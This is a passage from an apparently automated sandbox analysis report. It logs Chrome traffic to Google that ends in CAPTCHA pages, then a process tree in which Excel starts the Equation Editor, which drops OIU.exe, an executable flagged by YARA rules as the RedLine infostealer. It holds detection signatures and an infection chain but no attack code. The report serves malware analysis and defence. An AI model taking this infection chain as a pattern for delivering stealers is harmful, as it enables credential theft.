                                                                    2024-05-02 02:59:52 UTC | 1255 | IN | Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 7a 66 5a 54 59 6f 63 53 5f
                                                                    Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="zfZTYocS_
                                                                    2024-05-02 02:59:52 UTC | 1031 | IN | Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                    Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.22 | 49174 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:52 UTC | 738 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.22 | 49175 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:52 UTC | 1040 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:52 UTC | 1191 | IN | HTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: -1
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-TlEKPeuAt0bQNoNTeUB3Vg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                    Accept-CH: Sec-CH-UA-Model
                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                    Permissions-Policy: unload=()
                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2024-05-02 02:59:52 UTC | 64 | IN | Data Ascii: 685)]}'["",["airbnb icons x men","east fork san jacinto river
                                                                    2024-05-02 02:59:52 UTC | 1255 | IN | Data Ascii: flooding","miami dolphins stephen ross","ps plus may 2024 monthly games","heeramandi sanjay leela bhansali","uefa champions league dortmund vs psg","federal reserve interest rates","colleen hoover verity movie"],["","","","","","","",""],[],{"google:clie
                                                                    2024-05-02 02:59:52 UTC | 261 | IN | Data Ascii: levance":[1253,1252,1251,1250,601,600,551,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY
                                                                    2024-05-02 02:59:52 UTC | 5 | IN | Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.22 | 49176 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:52 UTC | 564 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC | 1453 | IN | HTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgsIqYPMsQYQgqa9OhIEv2CW4Q
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Server: gws
                                                                    Content-Length: 427
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:53 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC | 427 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.22 | 49177 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:52 UTC | 564 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC | 1398 | IN | HTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgsIqYPMsQYQyeSQPhIEv2CW4Q
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Server: gws
                                                                    Content-Length: 417
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:53 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC | 417 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.22 | 49179 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:53 UTC | 742 | OUT | GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3131
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC | 899 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
                                                                    2024-05-02 02:59:53 UTC | 1255 | IN | Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="wyqkQDpR6fNvARA5iytIFUgXuYZ
                                                                    2024-05-02 02:59:53 UTC | 977 | IN | Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.22 | 49180 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:53 UTC | 738 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3113
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                    2024-05-02 02:59:53 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 43 6b 31 73 76 64 37 53 76 42 45 4f 35 42 7a 68 79 64 33 49 73 55 79 66 49 6f 76 67 6f 41 6f 46 39
                                                                    Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Ck1svd7SvBEO5Bzhyd3IsUyfIovgoAoF9
                                                                    2024-05-02 02:59:53 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                    Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin



                                                                    Target ID:0
                                                                    Start time:04:58:17
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                    Imagebase:0x13fc00000
                                                                    File size:28'253'536 bytes
                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:04:59:06
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                    Imagebase:0x400000
                                                                    File size:543'304 bytes
                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:04:59:08
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 27%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:04:59:09
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Imagebase:0x150000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:04:59:09
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xea0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:04:59:10
                                                                    Start date:02/05/2024
